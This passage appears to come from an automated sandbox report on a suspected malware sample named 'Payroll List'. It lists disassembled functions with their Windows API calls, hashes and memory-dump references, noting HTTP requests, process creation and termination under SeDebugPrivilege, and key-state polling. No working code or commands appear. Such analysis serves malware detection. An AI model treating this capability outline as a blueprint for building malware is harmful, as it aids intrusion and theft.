                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000001), ref: 0013B691
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000002), ref: 0013B69F
                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0018ED3C
                                                                    • ImageList_EndDrag.COMCTL32 ref: 0018ED42
                                                                    • ReleaseCapture.USER32 ref: 0018ED48
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0018EDF0
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0018EE03
                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0018EEDC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 1924731296-2107944366
                                                                    • Opcode ID: 16cd3e755992ff968f513de0fc23c73bfefaa6d96a21eec519102a5634a91013
                                                                    • Instruction ID: 62057a66be54817095133e4de4f38dcfd0b6623a70a1eafc34f6f7b1d5ad453c
                                                                    • Opcode Fuzzy Hash: 16cd3e755992ff968f513de0fc23c73bfefaa6d96a21eec519102a5634a91013
                                                                    • Instruction Fuzzy Hash: A951A970204304AFD714EF20EC86FAE77E4BB98714F40491DF995972E2DBB09A94CB52
                                                                    Function 001745C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001745FF
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0017462B
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0017466D
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00174682
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0017468F
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001746BF
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00174706
                                                                      • Part of subcall function 00175052: GetLastError.KERNEL32(?,?,001743CC,00000000,00000000,00000001), ref: 00175067
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 1241431887-3916222277
                                                                    • Opcode ID: c7dd9d58c52c1555d8af6b193cdebd351823369e8b0b56261da43db0b56d0c7b
                                                                    • Instruction ID: 1c199c2e17c4bd31d634ad465877e12b5541f3ba16d95439e17b1f98f864298b
                                                                    • Opcode Fuzzy Hash: c7dd9d58c52c1555d8af6b193cdebd351823369e8b0b56261da43db0b56d0c7b
                                                                    • Instruction Fuzzy Hash: 77417CB1501619BFEB169FA0DC85FBA77BCFF09314F108116FA099A151D7B09A448BA4
                                                                    Function 0017B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001BDC00), ref: 0017B715
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001BDC00), ref: 0017B749
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0017B8C1
                                                                    • SysFreeString.OLEAUT32(?), ref: 0017B8EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: 5ea70f1d8672b209e6d8c460d9764afa9622e8b3ebc83638a25092b57d3747da
                                                                    • Instruction ID: 6e3c4ca6de37ceae33b411ba2f6579ba4d1e3eaf07743b924a98276ad40d878d
                                                                    • Opcode Fuzzy Hash: 5ea70f1d8672b209e6d8c460d9764afa9622e8b3ebc83638a25092b57d3747da
                                                                    • Instruction Fuzzy Hash: 71F13E75A04219EFCF04DF94C888EAEB7B9FF49315F108499F919AB250DB31AE45CB90
                                                                    Function 001824D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001824F5
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00182688
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001826AC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001826EC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0018270E
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0018286F
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001828A1
                                                                    • CloseHandle.KERNEL32(?), ref: 001828D0
                                                                    • CloseHandle.KERNEL32(?), ref: 00182947
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 7a780c60c9ad847c47e6757dffcaa6fa1ac49baa6cd7b84d7ef91ace14d729ae
                                                                    • Instruction ID: 40c79ace25991841712f25793326904909f5aea5ba49ff010162da34b37485ce
                                                                    • Opcode Fuzzy Hash: 7a780c60c9ad847c47e6757dffcaa6fa1ac49baa6cd7b84d7ef91ace14d729ae
                                                                    • Instruction Fuzzy Hash: 5ED1AC31604200DFCB15EF24D891A6EBBE5BF99310F14856DF88A9B2A2DB30DD45CF92
                                                                    Function 0018B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0018B3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: fd8cc3667757608b36dda86d9e0e4e326b5251b4c98c7437db435fe5f4cc9773
                                                                    • Instruction ID: a7ac2c7862eb477bc437e2cc2ea4867965491d9bfbf7cbfae0fe63b618ca636e
                                                                    • Opcode Fuzzy Hash: fd8cc3667757608b36dda86d9e0e4e326b5251b4c98c7437db435fe5f4cc9773
                                                                    • Instruction Fuzzy Hash: 3C519130608604BBEF24BF28DCCABAD3B65BB05314F644111FA16E66E2D771EA848F51
                                                                    Function 0013A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0019DB1B
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0019DB3C
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0019DB51
                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0019DB6E
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0019DB95
                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0013A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0019DBA0
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0019DBBD
                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0013A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0019DBC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: f56db2b49fa37d241ac17cbaf54cce209f9829007e3a68472a40b8668c96bea8
                                                                    • Instruction ID: 1ed51b2472fa97ff5e53c1666eaedc7c3c8ab51671b3daae188c1452f44f2588
                                                                    • Opcode Fuzzy Hash: f56db2b49fa37d241ac17cbaf54cce209f9829007e3a68472a40b8668c96bea8
                                                                    • Instruction Fuzzy Hash: 6B518870600208EFDF24DF68DC82FAA77B9AF19750F110518F9869B6D0D7B1AD90CB50
                                                                    Function 00167555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00165FA6,?), ref: 00166ED8
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00165FA6,?), ref: 00166EF1
                                                                      • Part of subcall function 001672CB: GetFileAttributesW.KERNEL32(?,00166019), ref: 001672CC
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001675CA
                                                                    • _wcscmp.LIBCMT ref: 001675E2
                                                                    • MoveFileW.KERNEL32(?,?), ref: 001675FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 0c880dcf94c84277fd7cea93f1fdc70e3115f7e85bd1e57555ff19e858ffecdc
                                                                    • Instruction ID: 60bcc243faaca9aad7ad7039baebd2178a9211d36b4f31a1cb46908dba667c4d
                                                                    • Opcode Fuzzy Hash: 0c880dcf94c84277fd7cea93f1fdc70e3115f7e85bd1e57555ff19e858ffecdc
                                                                    • Instruction Fuzzy Hash: 30514FB2A092199ADF55EB94DC81DDE73BC9F1C324B0040EAF605E3581EB7096D9CB60
                                                                    Function 0013EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0013EAEB
                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0013EB32
                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0019DC86
                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0019DCF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 2cd33b223a02ccdadee5a5d75ca317490a8d1a75def08e7ef509551259246d92
                                                                    • Instruction ID: 396c995685e2b2aed087013e8b3420f6f0af045db2440d59992fc2d047dfb76e
                                                                    • Opcode Fuzzy Hash: 2cd33b223a02ccdadee5a5d75ca317490a8d1a75def08e7ef509551259246d92
                                                                    • Instruction Fuzzy Hash: 4D41B670605780AADB3E4B289D8DA6ABED6AB56314F1A080DE08B969E5C770BC80D711
                                                                    Function 0015B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0015AEF1,00000B00,?,?), ref: 0015B26C
                                                                    • HeapAlloc.KERNEL32(00000000,?,0015AEF1,00000B00,?,?), ref: 0015B273
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0015AEF1,00000B00,?,?), ref: 0015B288
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0015AEF1,00000B00,?,?), ref: 0015B290
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0015AEF1,00000B00,?,?), ref: 0015B293
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0015AEF1,00000B00,?,?), ref: 0015B2A3
                                                                    • GetCurrentProcess.KERNEL32(0015AEF1,00000000,?,0015AEF1,00000B00,?,?), ref: 0015B2AB
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0015AEF1,00000B00,?,?), ref: 0015B2AE
                                                                    • CreateThread.KERNEL32(00000000,00000000,0015B2D4,00000000,00000000,00000000), ref: 0015B2C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: d31c3b72222b4ba5988f22417ae30503a50c5fd2598d9cfa1f04c03899601350
                                                                    • Instruction ID: b7c32318f9557c24e4d95d6a671fd182f0b850ec4265f10c09dc39b090448b1f
                                                                    • Opcode Fuzzy Hash: d31c3b72222b4ba5988f22417ae30503a50c5fd2598d9cfa1f04c03899601350
                                                                    • Instruction Fuzzy Hash: ED01C2B5240704BFEB10AFA5EC4DF5B7BACEB89711F014411FA05DB691CA749840CB71
                                                                    Function 0017C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 7bc922a9598d1f9a927058ecc229104f99de59d7d1dfa4c96e8dd57c949eecdd
                                                                    • Instruction ID: 6cfb762ca689cccf08ad8bd596c4138f7fd6b10caefc1c8ad0fb4d043a7c6523
                                                                    • Opcode Fuzzy Hash: 7bc922a9598d1f9a927058ecc229104f99de59d7d1dfa4c96e8dd57c949eecdd
                                                                    • Instruction Fuzzy Hash: 96E1A171A00219AFDF14DFA8D881AEEB7B9EF58314F14812DF909AB281D770AD41CBD1
                                                                    Function 0017BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2862541840-625585964
                                                                    • Opcode ID: a7f7557d6d837b1ebb35f92e47730049b8c906332fd9fb95a8f5c2c34894c231
                                                                    • Instruction ID: 77b11f908afa25094d6a1553f3597a9546d9313bf6bd33c86af56616e1708aab
                                                                    • Opcode Fuzzy Hash: a7f7557d6d837b1ebb35f92e47730049b8c906332fd9fb95a8f5c2c34894c231
                                                                    • Instruction Fuzzy Hash: 73919071A08219ABDF25CFA5C884FAEB7B8EF45714F10C55AF519AB280DB709944CFA0
                                                                    Function 00189A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00189B19
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00189B2D
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00189B47
                                                                    • _wcscat.LIBCMT ref: 00189BA2
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00189BB9
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00189BE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 46bc38779924f83a19318bf6ba96ea8422b231168951f33242b7be57d4f2740b
                                                                    • Instruction ID: f191f426ab01d2c3ebf3f14fd4edfc604bdbdba77dd2f3b0870ba8e0a2f9844d
                                                                    • Opcode Fuzzy Hash: 46bc38779924f83a19318bf6ba96ea8422b231168951f33242b7be57d4f2740b
                                                                    • Instruction Fuzzy Hash: C141A071A00348ABDB21AFA4DC85FEE77A8EF08350F14446AF589A7291D7719E84CF60
                                                                    Function 0018172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00166532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166554
                                                                      • Part of subcall function 00166532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166564
                                                                      • Part of subcall function 00166532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001665F9
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0018179A
                                                                    • GetLastError.KERNEL32 ref: 001817AD
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001817D9
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00181855
                                                                    • GetLastError.KERNEL32(00000000), ref: 00181860
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00181895
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: f0ec5d98d35921d88395157ff6ea703c72df9eec023aa2a6d81b17e1981aef6c
                                                                    • Instruction ID: 3ee6247d4abdb0ef8afb289d5cb3e81d1cab0e31fb667215a17e7ada5a06a73a
                                                                    • Opcode Fuzzy Hash: f0ec5d98d35921d88395157ff6ea703c72df9eec023aa2a6d81b17e1981aef6c
                                                                    • Instruction Fuzzy Hash: 7B419B72600200AFDB05FF64DCA6FADB7A5AF65310F058099F9069F282DB74AA45CF91
                                                                    Function 00165819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 001658B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 48380dac8c1d3eadd025b274e7ff84e4d35960f1d67eedd93f5434076d78e943
                                                                    • Instruction ID: 34f031afe36f2c28088a347fef6158c0d4059cc836c2d90ecc12fead3d82af28
                                                                    • Opcode Fuzzy Hash: 48380dac8c1d3eadd025b274e7ff84e4d35960f1d67eedd93f5434076d78e943
                                                                    • Instruction Fuzzy Hash: 56112C3620DB42BFE7055B569C82DAE379DDF29324F20003BF611E7AC1E7B0EA504665
